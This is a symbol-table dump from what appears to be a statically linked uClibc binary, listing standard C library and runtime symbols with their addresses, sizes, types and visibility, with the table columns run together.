                                                        __GI___close.symtab0x805224080FUNC<unknown>HIDDEN2
                                                        __GI___close_nocancel.symtab0x805224a27FUNC<unknown>HIDDEN2
                                                        __GI___ctype_b.symtab0x805cae84OBJECT<unknown>HIDDEN11
                                                        __GI___ctype_tolower.symtab0x805ccf04OBJECT<unknown>HIDDEN11
                                                        __GI___ctype_toupper.symtab0x805caf04OBJECT<unknown>HIDDEN11
                                                        __GI___errno_location.symtab0x804ef6413FUNC<unknown>HIDDEN2
                                                        __GI___fcntl_nocancel.symtab0x804eb2883FUNC<unknown>HIDDEN2
                                                        __GI___fgetc_unlocked.symtab0x80543ec204FUNC<unknown>HIDDEN2
                                                        __GI___glibc_strerror_r.symtab0x804ff8826FUNC<unknown>HIDDEN2
                                                        __GI___libc_close.symtab0x805224080FUNC<unknown>HIDDEN2
                                                        __GI___libc_fcntl.symtab0x804eb7b153FUNC<unknown>HIDDEN2
                                                        __GI___libc_open.symtab0x805229091FUNC<unknown>HIDDEN2
                                                        __GI___libc_read.symtab0x805235091FUNC<unknown>HIDDEN2
                                                        __GI___libc_waitpid.symtab0x80523b091FUNC<unknown>HIDDEN2
                                                        __GI___libc_write.symtab0x80522f091FUNC<unknown>HIDDEN2
                                                        __GI___open.symtab0x805229091FUNC<unknown>HIDDEN2
                                                        __GI___open_nocancel.symtab0x805229a33FUNC<unknown>HIDDEN2
                                                        __GI___read.symtab0x805235091FUNC<unknown>HIDDEN2
                                                        __GI___read_nocancel.symtab0x805235a33FUNC<unknown>HIDDEN2
                                                        __GI___register_atfork.symtab0x8051ffd195FUNC<unknown>HIDDEN2
                                                        __GI___sigaddset.symtab0x80504c432FUNC<unknown>HIDDEN2
                                                        __GI___sigdelset.symtab0x80504e432FUNC<unknown>HIDDEN2
                                                        __GI___sigismember.symtab0x80504a036FUNC<unknown>HIDDEN2
                                                        __GI___uClibc_fini.symtab0x80524e356FUNC<unknown>HIDDEN2
                                                        __GI___uClibc_init.symtab0x805254739FUNC<unknown>HIDDEN2
                                                        __GI___waitpid.symtab0x80523b091FUNC<unknown>HIDDEN2
                                                        __GI___write.symtab0x80522f091FUNC<unknown>HIDDEN2
                                                        __GI___write_nocancel.symtab0x80522fa33FUNC<unknown>HIDDEN2
                                                        __GI___xpg_strerror_r.symtab0x804ffa4191FUNC<unknown>HIDDEN2
                                                        __GI__exit.symtab0x804ec1466FUNC<unknown>HIDDEN2
                                                        __GI_abort.symtab0x8051440191FUNC<unknown>HIDDEN2
                                                        __GI_atoi.symtab0x805187017FUNC<unknown>HIDDEN2
                                                        __GI_brk.symtab0x8054d9444FUNC<unknown>HIDDEN2
                                                        __GI_close.symtab0x805224080FUNC<unknown>HIDDEN2
                                                        __GI_closedir.symtab0x8052a40130FUNC<unknown>HIDDEN2
                                                        __GI_config_close.symtab0x8052f2a44FUNC<unknown>HIDDEN2
                                                        __GI_config_open.symtab0x8052f5644FUNC<unknown>HIDDEN2
                                                        __GI_config_read.symtab0x8052cc0618FUNC<unknown>HIDDEN2
                                                        __GI_connect.symtab0x805013c84FUNC<unknown>HIDDEN2
                                                        __GI_dup2.symtab0x804ec8443FUNC<unknown>HIDDEN2
                                                        __GI_execl.symtab0x8051a14101FUNC<unknown>HIDDEN2
                                                        __GI_execve.symtab0x80528c447FUNC<unknown>HIDDEN2
                                                        __GI_exit.symtab0x80519b493FUNC<unknown>HIDDEN2
                                                        __GI_fclose.symtab0x8053060380FUNC<unknown>HIDDEN2
                                                        __GI_fcntl.symtab0x804eb7b153FUNC<unknown>HIDDEN2
                                                        __GI_fflush_unlocked.symtab0x8054190447FUNC<unknown>HIDDEN2
                                                        __GI_fgetc.symtab0x8053f1c145FUNC<unknown>HIDDEN2
                                                        __GI_fgetc_unlocked.symtab0x80543ec204FUNC<unknown>HIDDEN2
                                                        __GI_fgets.symtab0x8053fc4118FUNC<unknown>HIDDEN2
                                                        __GI_fgets_unlocked.symtab0x80544b894FUNC<unknown>HIDDEN2
                                                        __GI_fopen.symtab0x805323421FUNC<unknown>HIDDEN2
                                                        __GI_fork.symtab0x8051db4524FUNC<unknown>HIDDEN2
                                                        __GI_fputs_unlocked.symtab0x804fce845FUNC<unknown>HIDDEN2
                                                        __GI_fseek.symtab0x805505024FUNC<unknown>HIDDEN2
                                                        __GI_fseeko64.symtab0x8055068246FUNC<unknown>HIDDEN2
                                                        __GI_fstat.symtab0x8054dc070FUNC<unknown>HIDDEN2
                                                        __GI_fwrite_unlocked.symtab0x804fd18111FUNC<unknown>HIDDEN2
                                                        __GI_getc_unlocked.symtab0x80543ec204FUNC<unknown>HIDDEN2
                                                        __GI_getdtablesize.symtab0x804ecb032FUNC<unknown>HIDDEN2
                                                        __GI_getegid.symtab0x80528f48FUNC<unknown>HIDDEN2
                                                        __GI_geteuid.symtab0x804ecd08FUNC<unknown>HIDDEN2
                                                        __GI_getgid.symtab0x80528fc8FUNC<unknown>HIDDEN2
                                                        __GI_gethostbyname.symtab0x80500f014FUNC<unknown>HIDDEN2
                                                        __GI_gethostbyname2.symtab0x805010057FUNC<unknown>HIDDEN2
                                                        __GI_gethostbyname2_r.symtab0x80547e4666FUNC<unknown>HIDDEN2
                                                        __GI_gethostbyname_r.symtab0x8056528684FUNC<unknown>HIDDEN2
                                                        __GI_gethostname.symtab0x80567d489FUNC<unknown>HIDDEN2
                                                        __GI_getpagesize.symtab0x805290419FUNC<unknown>HIDDEN2
                                                        __GI_getpid.symtab0x80520e049FUNC<unknown>HIDDEN2
                                                        __GI_getrlimit.symtab0x804ece043FUNC<unknown>HIDDEN2
                                                        __GI_getsockname.symtab0x805019040FUNC<unknown>HIDDEN2
                                                        __GI_getuid.symtab0x80529188FUNC<unknown>HIDDEN2
                                                        __GI_htonl.symtab0x80500b47FUNC<unknown>HIDDEN2
                                                        __GI_htons.symtab0x80500a812FUNC<unknown>HIDDEN2
                                                        __GI_inet_addr.symtab0x80500d031FUNC<unknown>HIDDEN2
                                                        __GI_inet_aton.symtab0x8054750148FUNC<unknown>HIDDEN2
                                                        __GI_inet_ntop.symtab0x80556f2432FUNC<unknown>HIDDEN2
                                                        __GI_inet_pton.symtab0x805543f459FUNC<unknown>HIDDEN2
                                                        __GI_initstate_r.symtab0x8051733155FUNC<unknown>HIDDEN2
                                                        __GI_ioctl.symtab0x804ed0c139FUNC<unknown>HIDDEN2
                                                        __GI_isatty.symtab0x80546d427FUNC<unknown>HIDDEN2
                                                        __GI_kill.symtab0x804ed9843FUNC<unknown>HIDDEN2
                                                        __GI_lseek64.symtab0x805691890FUNC<unknown>HIDDEN2
                                                        __GI_memcpy.symtab0x804fd8841FUNC<unknown>HIDDEN2
                                                        __GI_memmove.symtab0x804fdb437FUNC<unknown>HIDDEN2
                                                        __GI_mempcpy.symtab0x80553a830FUNC<unknown>HIDDEN2
                                                        __GI_memrchr.symtab0x8054550177FUNC<unknown>HIDDEN2
                                                        __GI_memset.symtab0x804fddc50FUNC<unknown>HIDDEN2
                                                        __GI_mmap.symtab0x805284427FUNC<unknown>HIDDEN2
                                                        __GI_mremap.symtab0x805292059FUNC<unknown>HIDDEN2
                                                        __GI_munmap.symtab0x805295c43FUNC<unknown>HIDDEN2
                                                        __GI_nanosleep.symtab0x80529b161FUNC<unknown>HIDDEN2
                                                        __GI_ntohl.symtab0x80500c77FUNC<unknown>HIDDEN2
                                                        __GI_ntohs.symtab0x80500bb12FUNC<unknown>HIDDEN2
                                                        __GI_open.symtab0x805229091FUNC<unknown>HIDDEN2
                                                        __GI_opendir.symtab0x8052b4c132FUNC<unknown>HIDDEN2
                                                        __GI_pipe.symtab0x804edc439FUNC<unknown>HIDDEN2
                                                        __GI_poll.symtab0x805685d72FUNC<unknown>HIDDEN2
                                                        __GI_raise.symtab0x8052114100FUNC<unknown>HIDDEN2
                                                        __GI_random.symtab0x805150866FUNC<unknown>HIDDEN2
                                                        __GI_random_r.symtab0x805163495FUNC<unknown>HIDDEN2
                                                        __GI_rawmemchr.symtab0x805539419FUNC<unknown>HIDDEN2
                                                        __GI_read.symtab0x805235091FUNC<unknown>HIDDEN2
                                                        __GI_readdir64.symtab0x8052c3c129FUNC<unknown>HIDDEN2
                                                        __GI_recv.symtab0x80501f092FUNC<unknown>HIDDEN2
                                                        __GI_recvfrom.symtab0x805024c108FUNC<unknown>HIDDEN2
                                                        __GI_sbrk.symtab0x80529f064FUNC<unknown>HIDDEN2
                                                        __GI_select.symtab0x804ee61108FUNC<unknown>HIDDEN2
                                                        __GI_send.symtab0x80502b892FUNC<unknown>HIDDEN2
                                                        __GI_sendto.symtab0x8050314108FUNC<unknown>HIDDEN2
                                                        __GI_setsockopt.symtab0x805038056FUNC<unknown>HIDDEN2
                                                        __GI_setstate_r.symtab0x80517ce161FUNC<unknown>HIDDEN2
                                                        __GI_sigaction.symtab0x80527cf80FUNC<unknown>HIDDEN2
                                                        __GI_sigaddset.symtab0x80503e034FUNC<unknown>HIDDEN2
                                                        __GI_sigemptyset.symtab0x805040420FUNC<unknown>HIDDEN2
                                                        __GI_signal.symtab0x8050418136FUNC<unknown>HIDDEN2
                                                        __GI_sigprocmask.symtab0x804eed097FUNC<unknown>HIDDEN2
                                                        __GI_sleep.symtab0x8052178195FUNC<unknown>HIDDEN2
                                                        __GI_socket.symtab0x80503b840FUNC<unknown>HIDDEN2
                                                        __GI_sprintf.symtab0x804ef9830FUNC<unknown>HIDDEN2
                                                        __GI_srandom_r.symtab0x8051693160FUNC<unknown>HIDDEN2
                                                        __GI_stat.symtab0x80568a870FUNC<unknown>HIDDEN2
                                                        __GI_strcasecmp.symtab0x8056d2854FUNC<unknown>HIDDEN2
                                                        __GI_strchr.symtab0x804fe1030FUNC<unknown>HIDDEN2
                                                        __GI_strchrnul.symtab0x805451825FUNC<unknown>HIDDEN2
                                                        __GI_strcmp.symtab0x804fe3029FUNC<unknown>HIDDEN2
                                                        __GI_strcoll.symtab0x804fe3029FUNC<unknown>HIDDEN2
                                                        __GI_strcpy.symtab0x804fe5027FUNC<unknown>HIDDEN2
                                                        __GI_strcspn.symtab0x805460445FUNC<unknown>HIDDEN2
                                                        __GI_strdup.symtab0x805697448FUNC<unknown>HIDDEN2
                                                        __GI_strlen.symtab0x804fe6c19FUNC<unknown>HIDDEN2
                                                        __GI_strncpy.symtab0x804fe8038FUNC<unknown>HIDDEN2
                                                        __GI_strnlen.symtab0x804fea824FUNC<unknown>HIDDEN2
                                                        __GI_strpbrk.symtab0x80546b035FUNC<unknown>HIDDEN2
                                                        __GI_strrchr.symtab0x805453426FUNC<unknown>HIDDEN2
                                                        __GI_strspn.symtab0x805463442FUNC<unknown>HIDDEN2
                                                        __GI_strstr.symtab0x804fec0197FUNC<unknown>HIDDEN2
                                                        __GI_strtok.symtab0x805009022FUNC<unknown>HIDDEN2
                                                        __GI_strtok_r.symtab0x805466080FUNC<unknown>HIDDEN2
                                                        __GI_strtol.symtab0x805188423FUNC<unknown>HIDDEN2
                                                        __GI_sysconf.symtab0x8051b40523FUNC<unknown>HIDDEN2
                                                        __GI_tcgetattr.symtab0x80546f096FUNC<unknown>HIDDEN2
                                                        __GI_time.symtab0x804ef3416FUNC<unknown>HIDDEN2
                                                        __GI_times.symtab0x8052a3016FUNC<unknown>HIDDEN2
                                                        __GI_toupper.symtab0x804ef4429FUNC<unknown>HIDDEN2
                                                        __GI_uname.symtab0x80568f039FUNC<unknown>HIDDEN2
                                                        __GI_vfork.symtab0x8051d7c56FUNC<unknown>HIDDEN2
                                                        __GI_vsnprintf.symtab0x804efb8172FUNC<unknown>HIDDEN2
                                                        __GI_waitpid.symtab0x80523b091FUNC<unknown>HIDDEN2
                                                        __GI_wcrtomb.symtab0x8052f8463FUNC<unknown>HIDDEN2
                                                        __GI_wcsnrtombs.symtab0x8052fe0128FUNC<unknown>HIDDEN2
                                                        __GI_wcsrtombs.symtab0x8052fc427FUNC<unknown>HIDDEN2
                                                        __GI_write.symtab0x80522f091FUNC<unknown>HIDDEN2
                                                        __JCR_END__.symtab0x805c9e00OBJECT<unknown>DEFAULT9
                                                        __JCR_LIST__.symtab0x805c9e00OBJECT<unknown>DEFAULT9
                                                        __app_fini.symtab0x80614ec4OBJECT<unknown>HIDDEN12
                                                        __atexit_lock.symtab0x805cbd424OBJECT<unknown>DEFAULT11
                                                        __bss_start.symtab0x805ccf40NOTYPE<unknown>DEFAULTSHN_ABS
                                                        __check_one_fd.symtab0x805251b44FUNC<unknown>DEFAULT2
                                                        __close.symtab0x805224080FUNC<unknown>DEFAULT2
                                                        __close_nameservers.symtab0x805649c96FUNC<unknown>HIDDEN2
                                                        __close_nocancel.symtab0x805224a27FUNC<unknown>DEFAULT2
                                                        __ctype_b.symtab0x805cae84OBJECT<unknown>DEFAULT11
                                                        __ctype_tolower.symtab0x805ccf04OBJECT<unknown>DEFAULT11
                                                        __ctype_toupper.symtab0x805caf04OBJECT<unknown>DEFAULT11
                                                        __curbrk.symtab0x8063a504OBJECT<unknown>HIDDEN12
                                                        __data_start.symtab0x805ca080NOTYPE<unknown>DEFAULT11
                                                        __decode_dotted.symtab0x80558a4259FUNC<unknown>HIDDEN2
                                                        __decode_header.symtab0x8056a5c166FUNC<unknown>HIDDEN2
                                                        __deregister_frame_info_bases.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                        __dns_lookup.symtab0x80559a81842FUNC<unknown>HIDDEN2
                                                        __do_global_ctors_aux.symtab0x8056df00FUNC<unknown>DEFAULT2
                                                        __do_global_dtors_aux.symtab0x80480e00FUNC<unknown>DEFAULT2
                                                        __dso_handle.symtab0x805ca000OBJECT<unknown>HIDDEN11
                                                        __encode_dotted.symtab0x8056d60130FUNC<unknown>HIDDEN2
                                                        __encode_header.symtab0x80569a4182FUNC<unknown>HIDDEN2
                                                        __encode_question.symtab0x8056b0482FUNC<unknown>HIDDEN2
                                                        __environ.symtab0x80614e44OBJECT<unknown>DEFAULT12
                                                        __errno_location.symtab0x804ef6413FUNC<unknown>DEFAULT2
                                                        __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        __exit_cleanup.symtab0x8060f944OBJECT<unknown>HIDDEN12
                                                        __fcntl_nocancel.symtab0x804eb2883FUNC<unknown>DEFAULT2
                                                        __fgetc_unlocked.symtab0x80543ec204FUNC<unknown>DEFAULT2
                                                        __fini_array_end.symtab0x805c9d00NOTYPE<unknown>HIDDEN6
                                                        __fini_array_start.symtab0x805c9d00NOTYPE<unknown>HIDDEN6
                                                        __fork.symtab0x8051db4524FUNC<unknown>DEFAULT2
                                                        __fork_generation_pointer.symtab0x8063f584OBJECT<unknown>HIDDEN12
                                                        __fork_handlers.symtab0x8063f5c4OBJECT<unknown>HIDDEN12
                                                        __fork_lock.symtab0x8060f984OBJECT<unknown>HIDDEN12
                                                        __get_hosts_byname_r.symtab0x80564fc41FUNC<unknown>HIDDEN2
                                                        __get_pc_thunk_bx.symtab0x80480d00FUNC<unknown>HIDDEN2
                                                        __getdents64.symtab0x8054f38280FUNC<unknown>HIDDEN2
                                                        __getpagesize.symtab0x805290419FUNC<unknown>DEFAULT2
                                                        __getpid.symtab0x80520e049FUNC<unknown>DEFAULT2
                                                        __glibc_strerror_r.symtab0x804ff8826FUNC<unknown>DEFAULT2
                                                        __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        __h_errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                        __init_array_end.symtab0x805c9d00NOTYPE<unknown>HIDDEN6
                                                        __init_array_start.symtab0x805c9d00NOTYPE<unknown>HIDDEN6
                                                        __libc_close.symtab0x805224080FUNC<unknown>DEFAULT2
                                                        __libc_connect.symtab0x805013c84FUNC<unknown>DEFAULT2
                                                        __libc_disable_asynccancel.symtab0x805240c86FUNC<unknown>HIDDEN2
                                                        __libc_enable_asynccancel.symtab0x805246279FUNC<unknown>HIDDEN2
                                                        __libc_errno.symtab0x04TLS<unknown>HIDDEN6
                                                        __libc_fcntl.symtab0x804eb7b153FUNC<unknown>DEFAULT2
                                                        __libc_fork.symtab0x8051db4524FUNC<unknown>DEFAULT2
                                                        __libc_h_errno.symtab0x44TLS<unknown>HIDDEN6
                                                        __libc_nanosleep.symtab0x80529b161FUNC<unknown>DEFAULT2
                                                        __libc_open.symtab0x805229091FUNC<unknown>DEFAULT2
                                                        __libc_read.symtab0x805235091FUNC<unknown>DEFAULT2
                                                        __libc_recv.symtab0x80501f092FUNC<unknown>DEFAULT2
                                                        __libc_recvfrom.symtab0x805024c108FUNC<unknown>DEFAULT2
                                                        __libc_select.symtab0x804ee61108FUNC<unknown>DEFAULT2
                                                        __libc_send.symtab0x80502b892FUNC<unknown>DEFAULT2
                                                        __libc_sendto.symtab0x8050314108FUNC<unknown>DEFAULT2
                                                        __libc_setup_tls.symtab0x8054b2a513FUNC<unknown>DEFAULT2
                                                        __libc_sigaction.symtab0x80527cf80FUNC<unknown>DEFAULT2
                                                        __libc_stack_end.symtab0x80614e04OBJECT<unknown>DEFAULT12
                                                        __libc_waitpid.symtab0x80523b091FUNC<unknown>DEFAULT2
                                                        __libc_write.symtab0x80522f091FUNC<unknown>DEFAULT2
                                                        __linkin_atfork.symtab0x8051fe029FUNC<unknown>HIDDEN2
                                                        __lll_lock_wait_private.symtab0x8054a8040FUNC<unknown>HIDDEN2
                                                        __lll_unlock_wake_private.symtab0x8054ab032FUNC<unknown>HIDDEN2
                                                        __local_nameserver.symtab0x805b0a416OBJECT<unknown>HIDDEN4
                                                        __malloc_consolidate.symtab0x8051119379FUNC<unknown>HIDDEN2
                                                        __malloc_largebin_index.symtab0x805050438FUNC<unknown>DEFAULT2
                                                        __malloc_lock.symtab0x805caf824OBJECT<unknown>DEFAULT11
                                                        __malloc_state.symtab0x8063be0888OBJECT<unknown>DEFAULT12
                                                        __malloc_trim.symtab0x805109c125FUNC<unknown>DEFAULT2
                                                        __nameserver.symtab0x8063f904OBJECT<unknown>HIDDEN12
                                                        __nameservers.symtab0x8063f944OBJECT<unknown>HIDDEN12
                                                        __nptl_deallocate_tsd.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                        __nptl_nthreads.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                        __open.symtab0x805229091FUNC<unknown>DEFAULT2
                                                        __open_etc_hosts.symtab0x8056b5812FUNC<unknown>HIDDEN2
                                                        __open_nameservers.symtab0x805612f876FUNC<unknown>HIDDEN2
                                                        __open_nocancel.symtab0x805229a33FUNC<unknown>DEFAULT2
                                                        __pagesize.symtab0x80614e84OBJECT<unknown>DEFAULT12
                                                        __preinit_array_end.symtab0x805c9d00NOTYPE<unknown>HIDDEN6
                                                        __preinit_array_start.symtab0x805c9d00NOTYPE<unknown>HIDDEN6
                                                        __progname.symtab0x805cbf04OBJECT<unknown>DEFAULT11
                                                        __progname_full.symtab0x805cbf44OBJECT<unknown>DEFAULT11
                                                        __pthread_initialize_minimal.symtab0x8054d2b15FUNC<unknown>DEFAULT2
                                                        __pthread_mutex_init.symtab0x80524b73FUNC<unknown>DEFAULT2
                                                        __pthread_mutex_lock.symtab0x80524b43FUNC<unknown>DEFAULT2
                                                        __pthread_mutex_trylock.symtab0x80524b43FUNC<unknown>DEFAULT2
                                                        __pthread_mutex_unlock.symtab0x80524b43FUNC<unknown>DEFAULT2
                                                        __pthread_return_0.symtab0x80524b43FUNC<unknown>DEFAULT2
                                                        __pthread_unwind.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                        __read.symtab0x805235091FUNC<unknown>DEFAULT2
                                                        __read_etc_hosts_r.symtab0x8056b64451FUNC<unknown>HIDDEN2
                                                        __read_nocancel.symtab0x805235a33FUNC<unknown>DEFAULT2
                                                        __register_atfork.symtab0x8051ffd195FUNC<unknown>DEFAULT2
                                                        __register_frame_info_bases.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                        __res_sync.symtab0x8063f884OBJECT<unknown>HIDDEN12
                                                        __resolv_attempts.symtab0x805cce91OBJECT<unknown>HIDDEN11
                                                        __resolv_lock.symtab0x8063a5824OBJECT<unknown>DEFAULT12
                                                        __resolv_timeout.symtab0x805cce81OBJECT<unknown>HIDDEN11
                                                        __restore.symtab0x80527c70NOTYPE<unknown>DEFAULT2
                                                        __restore_rt.symtab0x80527c00NOTYPE<unknown>DEFAULT2
                                                        __rtld_fini.symtab0x80614f04OBJECT<unknown>HIDDEN12
                                                        __searchdomain.symtab0x8063f8c4OBJECT<unknown>HIDDEN12
                                                        __searchdomains.symtab0x8063f984OBJECT<unknown>HIDDEN12
                                                        __sigaddset.symtab0x80504c432FUNC<unknown>DEFAULT2
                                                        __sigdelset.symtab0x80504e432FUNC<unknown>DEFAULT2
                                                        __sigismember.symtab0x80504a036FUNC<unknown>DEFAULT2
                                                        __socketcall.symtab0x805286043FUNC<unknown>HIDDEN2
                                                        __socketcall.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        __stdin.symtab0x805cc044OBJECT<unknown>DEFAULT11
                                                        __stdio_READ.symtab0x805517862FUNC<unknown>HIDDEN2
                                                        __stdio_WRITE.symtab0x80551b8139FUNC<unknown>HIDDEN2
                                                        __stdio_adjust_position.symtab0x8055244154FUNC<unknown>HIDDEN2
                                                        __stdio_fwrite.symtab0x8053520232FUNC<unknown>HIDDEN2
                                                        __stdio_rfill.symtab0x80552e037FUNC<unknown>HIDDEN2
                                                        __stdio_seek.symtab0x805536446FUNC<unknown>HIDDEN2
                                                        __stdio_trans2r_o.symtab0x805530892FUNC<unknown>HIDDEN2
                                                        __stdio_trans2w_o.symtab0x8053714154FUNC<unknown>HIDDEN2
                                                        __stdio_wcommit.symtab0x80537b037FUNC<unknown>HIDDEN2
                                                        __stdout.symtab0x805cc084OBJECT<unknown>DEFAULT11
                                                        __syscall_error.symtab0x80527b015FUNC<unknown>HIDDEN2
                                                        __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        __syscall_nanosleep.symtab0x805298841FUNC<unknown>DEFAULT2
                                                        __syscall_poll.symtab0x805683045FUNC<unknown>DEFAULT2
                                                        __syscall_rt_sigaction.symtab0x805288c53FUNC<unknown>DEFAULT2
                                                        __syscall_rt_sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        __syscall_select.symtab0x804ee2857FUNC<unknown>DEFAULT2
                                                        __uClibc_fini.symtab0x80524e356FUNC<unknown>DEFAULT2
                                                        __uClibc_init.symtab0x805254739FUNC<unknown>DEFAULT2
                                                        __uClibc_main.symtab0x805256e577FUNC<unknown>DEFAULT2
                                                        __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        __uclibc_progname.symtab0x805cbec4OBJECT<unknown>HIDDEN11
                                                        __vfork.symtab0x8051d7c56FUNC<unknown>HIDDEN2
                                                        __waitpid.symtab0x80523b091FUNC<unknown>DEFAULT2
                                                        __waitpid_nocancel.symtab0x80523ba33FUNC<unknown>DEFAULT2
                                                        __write.symtab0x80522f091FUNC<unknown>DEFAULT2
                                                        __write_nocancel.symtab0x80522fa33FUNC<unknown>DEFAULT2
                                                        __xpg_strerror_r.symtab0x804ffa4191FUNC<unknown>DEFAULT2
                                                        __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        __xstat32_conv.symtab0x8054eab138FUNC<unknown>HIDDEN2
                                                        __xstat64_conv.symtab0x8054e08163FUNC<unknown>HIDDEN2
                                                        _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _bss_custom_printf_spec.symtab0x8060db410OBJECT<unknown>DEFAULT12
                                                        _charpad.symtab0x804f06453FUNC<unknown>DEFAULT2
                                                        _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _custom_printf_arginfo.symtab0x8063b8840OBJECT<unknown>HIDDEN12
                                                        _custom_printf_handler.symtab0x8063bb040OBJECT<unknown>HIDDEN12
                                                        _custom_printf_spec.symtab0x805caf44OBJECT<unknown>HIDDEN11
                                                        _dl_aux_init.symtab0x8054d3c18FUNC<unknown>DEFAULT2
                                                        _dl_init_static_tls.symtab0x805cce04OBJECT<unknown>DEFAULT11
                                                        _dl_nothread_init_static_tls.symtab0x8054d4e68FUNC<unknown>HIDDEN2
                                                        _dl_phdr.symtab0x8063f804OBJECT<unknown>DEFAULT12
                                                        _dl_phnum.symtab0x8063f844OBJECT<unknown>DEFAULT12
                                                        _dl_tls_dtv_gaps.symtab0x8063f741OBJECT<unknown>DEFAULT12
                                                        _dl_tls_dtv_slotinfo_list.symtab0x8063f704OBJECT<unknown>DEFAULT12
                                                        _dl_tls_generation.symtab0x8063f784OBJECT<unknown>DEFAULT12
                                                        _dl_tls_max_dtv_idx.symtab0x8063f684OBJECT<unknown>DEFAULT12
                                                        _dl_tls_setup.symtab0x8054afa48FUNC<unknown>DEFAULT2
                                                        _dl_tls_static_align.symtab0x8063f644OBJECT<unknown>DEFAULT12
                                                        _dl_tls_static_nelem.symtab0x8063f7c4OBJECT<unknown>DEFAULT12
                                                        _dl_tls_static_size.symtab0x8063f6c4OBJECT<unknown>DEFAULT12
                                                        _dl_tls_static_used.symtab0x8063f604OBJECT<unknown>DEFAULT12
                                                        _edata.symtab0x805ccf40NOTYPE<unknown>DEFAULTSHN_ABS
                                                        _end.symtab0x8063f9c0NOTYPE<unknown>DEFAULTSHN_ABS
                                                        _exit.symtab0x804ec1466FUNC<unknown>DEFAULT2
                                                        _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _fini.symtab0x8056e180FUNC<unknown>DEFAULT3
                                                        _fixed_buffers.symtab0x80615148192OBJECT<unknown>DEFAULT12
                                                        _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _fp_out_narrow.symtab0x804f09994FUNC<unknown>DEFAULT2
                                                        _fpmaxtostr.symtab0x80539541479FUNC<unknown>HIDDEN2
                                                        _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _init.symtab0x80480b40FUNC<unknown>DEFAULT1
                                                        _load_inttype.symtab0x80537d886FUNC<unknown>HIDDEN2
                                                        _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _ppfs_init.symtab0x804f6f4103FUNC<unknown>HIDDEN2
                                                        _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _ppfs_parsespec.symtab0x804f8d91036FUNC<unknown>HIDDEN2
                                                        _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _ppfs_prepargs.symtab0x804f75c57FUNC<unknown>HIDDEN2
                                                        _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _ppfs_setargs.symtab0x804f798277FUNC<unknown>HIDDEN2
                                                        _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _promoted_size.symtab0x804f8b041FUNC<unknown>DEFAULT2
                                                        _pthread_cleanup_pop_restore.symtab0x80524cc23FUNC<unknown>DEFAULT2
                                                        _pthread_cleanup_push_defer.symtab0x80524ba18FUNC<unknown>DEFAULT2
                                                        _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _setjmp.symtab0x805282034FUNC<unknown>DEFAULT2
                                                        _sigintr.symtab0x8063bd88OBJECT<unknown>HIDDEN12
                                                        _start.symtab0x804818434FUNC<unknown>DEFAULT2
                                                        _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _stdio_fopen.symtab0x805324c664FUNC<unknown>HIDDEN2
                                                        _stdio_init.symtab0x805360859FUNC<unknown>HIDDEN2
                                                        _stdio_openlist.symtab0x805cc0c4OBJECT<unknown>DEFAULT11
                                                        _stdio_openlist_add_lock.symtab0x80614f412OBJECT<unknown>DEFAULT12
                                                        _stdio_openlist_dec_use.symtab0x8054050320FUNC<unknown>HIDDEN2
                                                        _stdio_openlist_del_count.symtab0x80615104OBJECT<unknown>DEFAULT12
                                                        _stdio_openlist_del_lock.symtab0x806150012OBJECT<unknown>DEFAULT12
                                                        _stdio_openlist_use_count.symtab0x806150c4OBJECT<unknown>DEFAULT12
                                                        _stdio_streams.symtab0x805cc14204OBJECT<unknown>DEFAULT11
                                                        _stdio_term.symtab0x8053643208FUNC<unknown>HIDDEN2
                                                        _stdio_user_locking.symtab0x805cc104OBJECT<unknown>DEFAULT11
                                                        _stdlib_strto_l.symtab0x805189c278FUNC<unknown>HIDDEN2
                                                        _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _store_inttype.symtab0x805383061FUNC<unknown>HIDDEN2
                                                        _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _string_syserrmsgs.symtab0x8059fac2906OBJECT<unknown>HIDDEN4
                                                        _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _uintmaxtostr.symtab0x8053870228FUNC<unknown>HIDDEN2
                                                        _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _vfprintf_internal.symtab0x804f0f71530FUNC<unknown>HIDDEN2
                                                        _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
